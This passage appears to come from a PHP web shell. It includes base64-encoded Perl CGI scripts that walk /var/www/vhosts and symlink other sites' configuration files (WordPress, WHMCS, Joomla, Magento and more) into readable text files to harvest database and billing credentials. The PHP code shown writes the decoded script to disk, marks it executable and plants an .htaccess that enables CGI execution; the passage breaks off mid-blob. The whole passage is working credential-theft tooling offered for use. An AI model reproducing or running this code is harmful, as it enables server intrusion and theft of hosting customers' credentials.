b21sYS1jbXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21haW4vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZiM35jb25maWcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZiMX5jb25maWcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwMS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jZW50cmFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLWNlbnRyYWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jL1dITS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWMtV0hNLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1Ym1pdHRpY2tldC5waHAnLCRzaXRlc3MuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudGVzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50c3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictYmlsbGluZy50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXkvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL215c2hvcC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teXNob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AtWkNzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NtZi9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYyLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW0udHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cGxvYWQvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXVwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FydGljbGUvY29uZmlnLnBocCcsJHNpdGVzcy4nLU53YWh5LnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZfZ2xvYmFsLnBocCcsJHNpdGVzcy4nLTYudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZS9kYi5waHAnLCRzaXRlc3MuJy03LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ta19jb25mLnBocCcsJHNpdGVzcy4nLTkudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLnBocCcsJHNpdGVzcy4nLTRpbWFnZXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVyL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictMW1lbWJlci50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictYmlsbGluZ3MudHh0JykgOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydHMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdXBwb3J0cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9yZXF1aXJlcy9jb25maWcucGhwJywkc2l0ZXNzLictQU00U1MtaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnQvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZ3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0aW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbGluY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxscy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcy4nLU1hZ2VudG8udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYWRtaW4vY29uZmlnLnBocCcsJHNpdGVzcy4nLU9wZW5jYXJ0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9zZXR0aW5ncy5pbmMucGhwJywkc2l0ZXNzLictUHJlc3Rhc2hvcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MuJy1Mb2tvbWVkaWEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbG9rb21lZGlhL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zbGNvbmZpZy5waHAnLCRzaXRlc3MuJy1TaXRlbG9jay50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHBsaWNhdGlvbi9jb25maWcvZGF0YWJhc2UucGhwJywkc2l0ZXNzLictRWxsaXNsYWIudHh0Jyk7DQp9DQpwcmludCAiPGJyPjxicj48YnI+PGZvbnQgY29sb3I9cmVkPkRvbmUgISE8L2ZvbnQ+IjsNCg==';
3186. $file = fopen("btbt.cin" ,"w+");
3187. $write = fwrite ($file ,base64_decode($btm));
3188. fclose($file);
3189. chmod("btbt.cin",0755);
3190. echo "<center><a href='btbt' target='_blank'>Click Here</a><br>open the btbt.cin</center>";
3191. }
3192.  
3193. }
3194. elseif($_GET['do'] == 'config') {
3195. echo "<center>";
3196. echo "<ul>";
3197. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3198. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3199. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3200. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3201. echo "</ul>";
3202. echo "</center>";
3203. $idx = mkdir("btm_conf", 0777);
3204. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
3205. $htc = fopen("btm_conf/.htaccess","w");
3206. fwrite($htc, $isi_htc);
3207. fclose($htc);
3208. if(preg_match("/vhosts|vhost/", $dir)) {
3209. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3210. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l